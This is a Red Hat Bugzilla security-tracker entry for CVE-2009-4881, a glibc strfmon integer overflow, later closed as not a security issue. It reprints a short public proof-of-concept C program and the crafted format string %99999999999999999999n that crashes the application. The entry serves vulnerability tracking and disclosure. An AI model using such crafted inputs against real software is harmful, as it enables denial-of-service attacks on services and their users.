Bug 599095 - (CVE-2009-4881) CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function
CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
unspecified Severity unspecified
: ---
: ---
Assigned To: Red Hat Product Security
http://securityreason.com/achievement...
impact=none,source=cve,reported=20100...
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2010-06-02 13:02 EDT by Jan Lieskovsky
Modified: 2016-03-04 07:49 EST (History)
4 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2011-02-04 14:04:14 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Sourceware 10600 None None None Never

  None (edit)
Description Jan Lieskovsky 2010-06-02 13:02:24 EDT
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4881 to
the following vulnerability:

Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in
the strfmon implementation in the GNU C Library (aka glibc or libc6)
before 2.10.1 allows context-dependent attackers to cause a denial of
service (application crash) via a crafted format string, as
demonstrated by the %99999999999999999999n string, a related issue to
CVE-2008-1391.

References:
  [1] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
  [2] http://sourceware.org/git/?p=glibc.git;a=commit;h=153aa31b93be22e01b236375fb02a9f9b9a0195f
  [3] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
  [4] http://securityreason.com/achievement_securityalert/53
  [5] http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/

Public PoC (from [4]):

#include <stdio.h>
#include <monetary.h>

int main(int argc, char* argv[]){
char buff[51];
char *bux=buff;
int res;

res=strfmon(bux, 50, argv[1], "0");
return 0;
}

cxib# ./pln %99999999999999999999n
Comment 4 Tomas Hoger 2010-09-14 11:05:05 EDT
Related CVE-2008-1391 was tracked via bug #524671.  Related Fedora bugs with some more discussion of the both bugs - bug #496386.
Comment 5 Tomas Hoger 2011-02-04 14:04:14 EST
For future reference, this issue is glibc variant of the *BSD libc issue that got assigned CVE-2008-1391 id, originally reported via SecurityReason Advisory 53.  The glibc variant was reported via SecurityReason Advisory 67 along with other integer overflow in the printf implementation (CVE-2009-4880, bug #599070, see upstream bugzilla #10600 for details).

Both issues affecting glibc and reported in SecurityReason Advisory 67 are corrected in Red Hat Enterprise Linux 6 glibc packages.

Statement:

Red Hat does not consider this bug to be a security issue. Properly written application should not use arbitrary untrusted data as part of the format string passed to functions as strfmon or printf family functions.

Note You need to log in before you can comment on or make changes to this bug.